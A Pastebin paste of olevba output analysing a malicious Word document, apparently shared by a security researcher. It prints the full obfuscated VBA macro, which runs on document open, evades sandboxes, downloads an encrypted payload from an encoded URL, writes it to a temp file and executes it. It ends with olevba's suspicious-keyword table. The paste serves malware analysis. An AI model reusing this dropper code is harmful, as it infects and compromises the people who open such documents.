API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Jan 29th, 2016
556
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 13.17 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS-HB-V vbaproject.bin
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vbaproject.bin
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vbaproject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Type K6nSWfYTCJ
  16.   ETOOEcUg59j As Long
  17.   HhjG8qlzfRpsnobBF As Integer
  18.   MUF5U7fJz As Integer
  19.   G8Q0vHJIdAb91I(7) As Byte
  20. End Type
  21. Const VTGFhpz7FtVD As String = "{00000000-0000-0000-C000-000000000046}"
  22. Private Type NdM1mpKmqpF
  23.   HK8KPt1wnHrS As Long
  24.   JITUN As IUnknown
  25.   PqxBjecC7mI As Long
  26. End Type
  27. Private Type SyROO3UWtSacSa
  28.   XnTmqqh As Long
  29.   Ai9rugFwqT4H43zjH As Long
  30.   NTAGj As String
  31.   H7LBpJk0XA As Long
  32. End Type
  33. #If VBA7 Then
  34. Private Declare PtrSafe Function CoCreateInstanceEx Lib "ole32" (RDKzbu95tmi As K6nSWfYTCJ, ByVal SfmbYfniannm4s As Long, ByVal XUoz1Syc2RL As Long, PHZ6Q7NJb9 As SyROO3UWtSacSa, ByVal Yo1VAUevWQXQ3Rx9 As Long, XZpi9rugFwq As NdM1mpKmqpF) As Long
  35. Private Declare PtrSafe Function CLSIDFromProgID Lib "ole32" (ByVal M7FCWQq60fKbE As Long, Rvk1sUXlk As K6nSWfYTCJ) As Long
  36. Private Declare PtrSafe Function CLSIDFromString Lib "ole32" (ByVal VpGhFxvC As Long, PBiRBJf As K6nSWfYTCJ) As Long
  37. #Else
  38. Private Declare Function CLSIDFromString Lib "ole32" (ByVal UyDGN6 As Long, AYHEgLU27r8 As K6nSWfYTCJ) As Long
  39. Private Declare Function CLSIDFromProgID Lib "ole32" (ByVal Lk0XAUi0 As Long, DbVPe As K6nSWfYTCJ) As Long
  40. Private Declare Function CoCreateInstanceEx Lib "ole32" (PgGec2k6Kp0s As K6nSWfYTCJ, ByVal KMcNTG5kHdZheA As Long, ByVal WBdlv2f As Long, T8AWG9okSELXY As SyROO3UWtSacSa, ByVal RvgKcDV25jAf As Long, PKf91CWRm As NdM1mpKmqpF) As Long
  41. #End If
  42. Private OH0M As String
  43. Dim W4epF2liCnvk As String, JImjWUnbapFXE As Integer
  44. Dim JImjWUnbapFXE1() As Variant, JImjWUnbapFXE2() As Variant, JImjWUnbapFXE3() As Variant, JImjWUnbapFXE4() As Variant, JImjWUnbapFXE5() As Variant, JImjWUnbapFXE6() As Variant, JImjWUnbapFXE7() As Variant, JImjWUnbapFXE8() As Variant, JImjWUnbapFXE9() As Variant, JImjWUnbapFXE10() As Variant
  45. Dim JImjWUnbapFXE11() As Variant, JImjWUnbapFXE12() As Variant, JImjWUnbapFXE13() As Variant, JImjWUnbapFXE14() As Variant, JImjWUnbapFXE15() As Variant, JImjWUnbapFXE16() As Variant, JImjWUnbapFXE17() As Variant, JImjWUnbapFXE18() As Variant, JImjWUnbapFXE19() As Variant, JImjWUnbapFXE20() As Variant
  46. Dim JImjWUnbapFXE21() As Variant, JImjWUnbapFXE22() As Variant, JImjWUnbapFXE23() As Variant, JImjWUnbapFXE24() As Variant, JImjWUnbapFXE25() As Variant, JImjWUnbapFXE26() As Variant, JImjWUnbapFXE27() As Variant, JImjWUnbapFXE28() As Variant, JImjWUnbapFXE29() As Variant, JImjWUnbapFXE30() As Variant, JImjWUnbapFXE31() As Variant, JImjWUnbapFXE32() As Variant, JImjWUnbapFXE33() As Variant, JImjWUnbapFXE34() As Variant, JImjWUnbapFXE35() As Variant, JImjWUnbapFXE36() As Variant, JImjWUnbapFXE37() As Variant, JImjWUnbapFXE38() As Variant
  47. Function DTpA9fMZ2v() As String
  48. OdZH6Tn3dSUI = 12 + "1"
  49. Dim PJXRSt12hAfr As Long
  50. EX74nuarzwX0o = 32 + "87"
  51. AIfaz64P1sE:
  52. WjwN7I = 39 + "74"
  53. Randomize
  54. YvRYF79sj = 37 + "53"
  55. PJXRSt12hAfr = Int((2500 + 119 + 2500 - 119 + 2500 + 119 + 2500 - 119 - 1) * Rnd)
  56. U8vjtAoK3omal = 36 + "56"
  57. If PJXRSt12hAfr < (25 + 616 + 25 - 616 + 25 + 616 + 25 - 616 - 1) Then GoTo AIfaz64P1sE
  58. Y4SV1y5K = 84 + "71"
  59. DTpA9fMZ2v = PJXRSt12hAfr
  60. GUQhHESPDlfw2Dik = 44 + "92"
  61. End Function
  62. Sub Vg0DiIzgDxA()
  63. B0QeiiufSU = 10 + "80"
  64. Dim QQNuYU2Zlz1U As String, Bhkve9C81y9l As Object, FPODmkbfj9lL As Object
  65. BMLiyu5c = 9 + "36"
  66. QQNuYU2Zlz1U = Environ(NGh52oil6(YD0sRL05aK("F4BBC8D2D8EE14"), "S2TJblsfEeFIG4jw")) & NGh52oil6(YD0sRL05aK("C9CBF3BDC5BB7331553A095530162E"), "MmVtHw8zjF") & OH0M & NGh52oil6(YD0sRL05aK("94DBD7FD"), "Ej8dvvgPAEc")
  67. Jx9miqJGRIH = 19 + "51"
  68. Set Bhkve9C81y9l = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("84C0F8C71D3C0D374A51182216732C1124"), "JdV6v"))
  69. UF1foE3p1Ghu = 42 + "9"
  70. Bhkve9C81y9l.Open NGh52oil6(YD0sRL05aK("8C89CD"), "HbtYl5IU6f346"), NGh52oil6(YD0sRL05aK("F2CAEFC0A0BE6F7C5D495D7050625A7B74574D4A6A773A31065915241F63"), "RhnjOMFClneOdAeB") & DTpA9fMZ2v, 0
  71. Qqwa0pezUa = 46 + "77"
  72. Bhkve9C81y9l.SEnD
  73. If Bhkve9C81y9l.Status = (50 + 252 + 50 - 252 + 50 + 252 + 50 - 252) Then GoTo Qhyoa
  74. OQl8VsVOF = 44 + "12"
  75. Exit Sub
  76. WcALqwx0acTSQ = 86 + "55"
  77. Qhyoa:
  78. XMCvW736Mek5pCa = 49 + "74"
  79. GSfLoW0xSKEex QQNuYU2Zlz1U, NGh52oil6(StrConv(Bhkve9C81y9l.resPONSEBODy, (16 + 160 + 16 - 160 + 16 + 160 + 16 - 160)), NGh52oil6(YD0sRL05aK("A9AFEF998884"), "S3fHEWs27m"))
  80. FKiWdJ6VvcA2 = 67 + "47"
  81. Set FPODmkbfj9lL = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEE7EEC6E2E4395B1007092534"), "BTHCktKrKff"))
  82. MAR6Q70cJOeU = 93 + "28"
  83. FPODmkbfj9lL.eXeC """" & QQNuYU2Zlz1U & """"
  84. LHcLiuF = 79 + "67"
  85. Set Bhkve9C81y9l = Nothing
  86. End Sub
  87. Function NGh52oil6(ByVal GA5N56mzJIETaw As String, MJCIRg As String) As String
  88. JRi6mghhJeD = 55 + "92"
  89. On Error Resume Next
  90. QJM2eJP6YM = 74 + "62"
  91. Dim TtG2N() As Byte, XSKEexRnULKVWy(0 To 285) As Integer, UL3zdJc5GwhYx() As Byte, OLprI, Kj2MuBYW03KPx, HVhU1xMTZP9, IbY9Gm0yb15RKib, Sf1unpciXO As Boolean, I4GS0hdSZfSW0jT As Long
  92. DdUU = 69 + "32"
  93. TtG2N = StrConv(GA5N56mzJIETaw, (32 + 679 + 32 - 679 + 32 + 679 + 32 - 679))
  94. MscKtjWPOEW = 61 + "58"
  95. UL3zdJc5GwhYx() = StrConv(MJCIRg, (32 + 907 + 32 - 907 + 32 + 907 + 32 - 907))
  96. RDoGEkeb = 72 + "23"
  97. Kj2MuBYW03KPx = UBound(UL3zdJc5GwhYx)
  98. Pd5eabFh = 88 + "81"
  99. For OLprI = 0 To (64 + 700 + 64 - 700 + 64 + 700 + 64 - 700 - 1)
  100. XSKEexRnULKVWy(OLprI) = OLprI
  101. Next OLprI
  102. For OLprI = (64 + 790 + 64 - 790 + 64 + 790 + 64 - 790) To (71.5 + 658 + 71.5 - 658 + 71.5 + 658 + 71.5 - 658 - 1)
  103. XSKEexRnULKVWy(OLprI) = FCWXoQwGqoI2gsq(OLprI, (64 + 406 + 64 - 406 + 64 + 406 + 64 - 406))
  104. Next OLprI
  105. For OLprI = 1 To (1.5 + 666 + 1.5 - 666 + 1.5 + 666 + 1.5 - 666)
  106. XSKEexRnULKVWy(OLprI + (62.5 + 337 + 62.5 - 337 + 62.5 + 337 + 62.5 - 337 - 1)) = UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI)
  107. XSKEexRnULKVWy(OLprI - 1) = FCWXoQwGqoI2gsq(UL3zdJc5GwhYx(OLprI - 1), (16 + 256 + 16 - 256 + 16 + 256 + 16 - 256 - 1) * (1 + 320 + 1 - 320 + 1 + 320 + 1 - 320) + (1 + 896 + 1 - 896 + 1 + 896 + 1 - 896 - 1) - UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI))
  108. Next OLprI
  109. Sf1unpciXO = False
  110. HVhU1xMTZP9 = 0
  111. IbY9Gm0yb15RKib = 0
  112. For OLprI = 0 To UBound(TtG2N)
  113. If HVhU1xMTZP9 > Kj2MuBYW03KPx Then HVhU1xMTZP9 = 0
  114. If IbY9Gm0yb15RKib > (71.5 + 619 + 71.5 - 619 + 71.5 + 619 + 71.5 - 619 - 1) And Sf1unpciXO = False Then IbY9Gm0yb15RKib = 0: Sf1unpciXO = Not (Sf1unpciXO)
  115. If IbY9Gm0yb15RKib > (71.5 + 854 + 71.5 - 854 + 71.5 + 854 + 71.5 - 854 - 1) And Sf1unpciXO = True Then IbY9Gm0yb15RKib = (1.5 + 235 + 1.5 - 235 + 1.5 + 235 + 1.5 - 235 - 1): Sf1unpciXO = Not (Sf1unpciXO)
  116. I4GS0hdSZfSW0jT = FCWXoQwGqoI2gsq(TtG2N(OLprI), XSKEexRnULKVWy(IbY9Gm0yb15RKib))
  117. TtG2N(OLprI) = FCWXoQwGqoI2gsq(I4GS0hdSZfSW0jT, UL3zdJc5GwhYx(HVhU1xMTZP9))
  118. HVhU1xMTZP9 = HVhU1xMTZP9 + 1
  119. IbY9Gm0yb15RKib = IbY9Gm0yb15RKib + 1
  120. Next OLprI
  121. EzFqMf2JEX = 24 + "35"
  122. NGh52oil6 = StrConv(TtG2N(), (8 + 630 + 8 - 630 + 8 + 630 + 8 - 630) + (8 + 327 + 8 - 327 + 8 + 327 + 8 - 327))
  123. V8vVy8c = 44 + "53"
  124. End Function
  125. Function HS5RGT77EhJD9(ByVal YgXIV4mbjX As String) As IUnknown
  126. VFSW = 29 + "97"
  127. Dim VY35qfuHGIJnNWf As K6nSWfYTCJ, JrNlWUn8fgH9 As K6nSWfYTCJ, J36506Vmo As Long, Gu6IFZ1v As SyROO3UWtSacSa, G0dqKDSDuamdZ As NdM1mpKmqpF
  128. Ex9Mufxr = 68 + "34"
  129. CLSIDFromString StrPtr(VTGFhpz7FtVD), JrNlWUn8fgH9
  130. SwP80p = 30 + "75"
  131. G0dqKDSDuamdZ.HK8KPt1wnHrS = VarPtr(JrNlWUn8fgH9)
  132. Xcb = 42 + "47"
  133. J36506Vmo = CLSIDFromProgID(StrPtr(YgXIV4mbjX), VY35qfuHGIJnNWf)
  134. AmyEXN = 56 + "30"
  135. If J36506Vmo <> 0 Then Exit Function
  136. NcwUlf6m = 77 + "70"
  137. CoCreateInstanceEx VY35qfuHGIJnNWf, 0, 21, Gu6IFZ1v, 1, G0dqKDSDuamdZ
  138. BkzbxnGoPVt16A0cr = 10 + "80"
  139. Set HS5RGT77EhJD9 = G0dqKDSDuamdZ.JITUN
  140. Fi2vNcINQoSl8IO = 40 + "16"
  141. End Function
  142. Sub Document_Open()
  143. VT8UOUgsRwp = 92 + "14"
  144. On Error Resume Next
  145. UxXwF = 73 + "97"
  146. Dim QrqheSTtixuDC7dV9 As Long, KfEMUDskqqcvM As Long, XS5SDGNPiDrGvSh As Long
  147. CGo5 = 67 + "95"
  148. QrqheSTtixuDC7dV9 = 92378621: KfEMUDskqqcvM = 0: XS5SDGNPiDrGvSh = 0
  149. UbRDiiO1JR = 19 + "16"
  150. For KfEMUDskqqcvM = 1 To QrqheSTtixuDC7dV9
  151. XS5SDGNPiDrGvSh = XS5SDGNPiDrGvSh + 1
  152. Next KfEMUDskqqcvM
  153. LWEH6Qx2EwORo9 = 75 + "3"
  154. If XS5SDGNPiDrGvSh = QrqheSTtixuDC7dV9 Then
  155. NtHyo8aEUBc = 71 + "93"
  156. Dim L8eK2L608u2Q As Integer, HnbvNeARy As String
  157. For L8eK2L608u2Q = 6 To 511
  158. HnbvNeARy = HnbvNeARy + L8eK2L608u2Q
  159. Next
  160. AsrO2I7HYgu = 80 + "92"
  161. If (13.5 + 874 + 13.5 - 874 + 13.5 + 874 + 13.5 - 874 - 1) = (13.5 + 135 + 13.5 - 135 + 13.5 + 135 + 13.5 - 135 - 1) Then
  162. AJcvBp = 4 + "31"
  163. OH0M = DTpA9fMZ2v
  164. KZ9mSgQ0rgT2Uw = 8 + "52"
  165. If zKK(56) = True Then
  166. AdSLYPqnY7dQB = 16 + "29"
  167. Vg0DiIzgDxA
  168. ELl1nzDlSZ1y = 79 + "15"
  169. Else
  170. GLXGfQ7NxKnYj19U = 39 + "70"
  171. Mze1TQqABB13R
  172. XCzEv3EbmKe = 42 + "60"
  173. End If
  174. Else
  175. YlSe09O7zL = 67 + "64"
  176. Mze1TQqABB13R
  177. DMAKmdxzzr0 = 10 + "19"
  178. End If
  179. Mne6wJBeADKYmM2 = 70 + "37"
  180. Else
  181. T0FFypb0vGRCDg = 98 + "10"
  182. Mze1TQqABB13R
  183. G3qne510I = 9 + "6"
  184. End If
  185. XMW4XDjRhDv = 21 + "22"
  186. End Sub
  187. Function YX0A(ByVal MQtzLoXuOYbLqu As Variant) As Long
  188. OuFnguCHQCvkiEP = 1 + "39"
  189. Dim QwpqyS1CCmGIHl() As Byte, TSkgb6tQQP As Long
  190. QwpqyS1CCmGIHl = MQtzLoXuOYbLqu
  191. TSkgb6tQQP = UBound(QwpqyS1CCmGIHl)
  192. OYeqxyYkF0vmrK = 61 + "10"
  193. YX0A = (TSkgb6tQQP + 1) / 2
  194. GYQeYWE = 55 + "7"
  195. End Function
  196. Private Function FCWXoQwGqoI2gsq(RPDg57P7hlEFgul, ADcW8E85E1Pax)
  197. FCWXoQwGqoI2gsq = (RPDg57P7hlEFgul And Not ADcW8E85E1Pax) Or (Not RPDg57P7hlEFgul And ADcW8E85E1Pax)
  198. End Function
  199. Sub GSfLoW0xSKEex(VvtBc6OjlU As String, B6V96KLhYx As String)
  200. Dim GV0xeDx0mp3 As Object
  201. IJrWlrmJ6zEyhI8rS = 47 + "89"
  202. Set GV0xeDx0mp3 = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEEEE5AFE7FD3703194F750A120A3E213A27322C1A2F16041354"), "WYBERAXjvh9hrbc"))
  203. IpK6h9F6mCyBp = 36 + "75"
  204. With GV0xeDx0mp3.CrEatEtextFILe(VvtBc6OjlU)
  205. CXAZvr3a3HQHRio = 91 + "90"
  206. .WrItE (B6V96KLhYx)
  207. PBuOt0qn2gZW = 42 + "91"
  208. .Close
  209. PTUNv57 = 85 + "16"
  210. End With
  211. IiJHZnqkHbh = 92 + "76"
  212. Set GV0xeDx0mp3 = Nothing
  213. N1Rzcq2EbVxloSUDZ = 28 + "44"
  214. End Sub
  215. Sub Mze1TQqABB13R()
  216. XCISdGMlkVj = 87 + "37"
  217. DoEvents
  218. ChDir 17
  219. Weekday 66
  220. C3T0ybW1xUCCzcT = EOF(17)
  221. Sin 39
  222. Rnd
  223. WvrdmO99Bp36Dt = Day(27)
  224. App.StartLogging "TiCejbAsO", 62
  225. AvzmJBeh7hYw = DateValue(56)
  226. CallByName GfvNc, 1, VbMethod, 42, 89, 74
  227. EEWiNLRPCNEchhE = 37 + "48"
  228. End Sub
  229. Function YD0sRL05aK(V3fzXeOUBPx2S8XV As String) As String
  230. Qe6K16Ywzx = 27 + "58"
  231. Dim Ps3eMvayS2uM As Integer
  232. JkCld06th = 16 + "51"
  233. For Ps3eMvayS2uM = 1 To YX0A(V3fzXeOUBPx2S8XV) Step 2
  234. YD0sRL05aK = YD0sRL05aK & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(V3fzXeOUBPx2S8XV, Ps3eMvayS2uM, 2)))
  235. Next
  236. RmzBqzO5y = 81 + "13"
  237. End Function
  238. Function zKK(LUKdO7lrt As Integer) As Boolean
  239. Oba3cMG = 38 + "16"
  240. Static KJPXc As Byte
  241. DyHz6lC = 57 + "65"
  242. KJPXc = KJPXc + 1
  243. WUO9NHeGmcc1l7 = 63 + "74"
  244. If KJPXc = 1 Then Debug.Assert Not zKK(93)
  245. CkSCXIFqJrIuf = 39 + "7"
  246. zKK = KJPXc = 0
  247. Iak1tN3MMkVX = 72 + "12"
  248. KJPXc = 0
  249. R3eNqpCWdmoXNS = 30 + "40"
  250. End Function
  251.  
  252. +------------+----------------------+-----------------------------------------+
  253. | Type       | Keyword              | Description                             |
  254. +------------+----------------------+-----------------------------------------+
  255. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  256. | Suspicious | Open                 | May open a file                         |
  257. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  258. |            |                      | function calls                          |
  259. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  260. |            |                      | strings                                 |
  261. | Suspicious | CreateTextFile       | May create a text file                  |
  262. | Suspicious | Environ              | May read system environment variables   |
  263. | Suspicious | Write                | May write to a file (if combined with   |
  264. |            |                      | Open)                                   |
  265. | Suspicious | Lib                  | May run code from a DLL                 |
  266. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  267. |            |                      | be used to obfuscate strings (option    |
  268. |            |                      | --decode to see all)                    |
  269. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  270. |            |                      | may be used to obfuscate strings        |
  271. |            |                      | (option --decode to see all)            |
  272. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  273. |            | Strings              | may be used to obfuscate strings        |
  274. |            |                      | (option --decode to see all)            |
  275. | VBA string | &H                   | Chr$(38) & Chr$(72)                     |
  276. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!